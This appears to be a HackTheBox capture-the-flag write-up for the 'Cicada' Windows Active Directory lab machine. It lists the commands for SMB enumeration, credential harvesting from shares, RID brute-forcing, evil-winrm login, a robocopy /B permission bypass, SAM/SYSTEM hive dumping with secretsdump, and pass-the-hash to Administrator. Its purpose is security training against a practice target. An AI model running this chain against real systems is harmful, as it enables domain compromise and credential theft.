HackTheBox Cicada Writeup

Dive into the depths of cybersecurity with the Cicada The Flag (CTF) challenge, a easy-level test of skill designed for seasoned professionals. This intense CTF writeup guides you through advanced techniques and complex vulnerabilities, pushing your expertise to the limit.

Add Hosts#

Edit the /etc/hosts file and add the following entries:

10.10.11.35 cicada.htb

Script to add hosts automatically#

ip="10.10.11.35"
domain="cicada.htb"
grep -qF "$ip $domain" /etc/hosts || echo -e "$ip $domain" | sudo tee -a /etc/hosts

Mapping#

nmap -sCV cicada.htb

Starting Nmap 7.95 ( https://nmap.org ) at 2024-10-02 22:04 CEST
Stats: 0:00:56 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 98.39% done; ETC: 22:05 (0:00:00 remaining)
Nmap scan report for cicada.htb (10.10.11.35)
Host is up (0.051s latency).
Not shown: 988 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-10-03 03:04:51Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after:  2025-08-22T20:24:16
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after:  2025-08-22T20:24:16
|_ssl-date: TLS randomness does not represent time
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after:  2025-08-22T20:24:16
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after:  2025-08-22T20:24:16
|_ssl-date: TLS randomness does not represent time
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: Host: CICADA-DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2024-10-03T03:05:32
|_  start_date: N/A
|_clock-skew: 7h00m00s

1. Enumerate SMB Shares Using smbclient#

smbclient -L //10.10.11.35

• Lists available SMB shares on the target machine.

2. Access the HR Share with SMBv2#

smbclient //10.10.11.35/HR -U '' -m SMB2

• Anonymous login to the HR share, forcing SMBv2 protocol.

3. Read Notice from HR.txt for Credentials#

more "Notice from HR.txt"

• Use more to read the Notice from HR.txt file, which contains credentials for user michael.wrightson.

4. Enumerate Users via RID Bruteforce Using netexec#

netexec smb --rid-brute -u guest -p '' -t 10 10.10.11.35

• Perform RID bruteforce on the SMB server using the guest account.
• -t 10 increases thread count for faster scanning.

5. Further Enumeration Using enum4linux#

enum4linux-ng -u michael.wrightson -p '<password_from_notice_file>' -A 10.10.11.35 -d

• Run enum4linux to gather detailed SMB information. One user found may be:

'1108':
  username: david.orelious
  name: (null)
  acb: '0x00000210'
  description: Just in case I forget my password is [REDACTED]

6. Access DEV Share Using smbclient#

smbclient -U david.orelious //10.10.11.35/DEV

• Navigate the DEV share and find Backup_script.ps1.

more Backup_script.ps1

• This reveals credentials for user emily.oscars.

7. Log in to the System Using evil-winrm#

evil-winrm -i 10.10.11.35 -u emily.oscars -p '<password_from_ps1>'

• Use credentials from Backup_script.ps1 to log in with evil-winrm.

8. Retrieve the user.txt Flag#

type ../Desktop/user.txt

• Read the user.txt flag on the desktop of emily.oscars.

9. Privilege Escalation Using robocopy#

robocopy C:\Users\Administrator\Desktop C:\Users\Public root.txt /B

• Copy root.txt from the Administrator’s desktop to the public directory using robocopy with the /B flag to bypass permissions.

10. Read the root.txt Flag#

type C:\Users\Public\root.txt

• Display the root.txt flag.

Beyond Root with NT Admin Shell#

1. Log Back into the System Using evil-winrm

evil-winrm -i 10.10.11.35 -u emily.oscars -p '<password_from_ps1>'

2. Check Privileges in the Current Session

whoami /priv

3. Dump the SAM and SYSTEM Registry Files

reg save hklm\sam sam
reg save hklm\system system
dir

• This saves the sam and system registry files to the current directory.

4. Download SAM and SYSTEM Files

download sam
download system

5. Extract NTLM Hashes Using Impacket’s secretsdump

impacket-secretsdump -sam sam -system system LOCAL

• Extract the NTLM hash:

Administrator:500:aad3b43....35b51404ee:[REDACTED_HASH]:::

6. Log in as Administrator Using the NTLM Hash

evil-winrm -u 'Administrator' -H '<Admin-Hash>' -i cicada.htb

• Use the Administrator NTLM hash to gain full access to the system.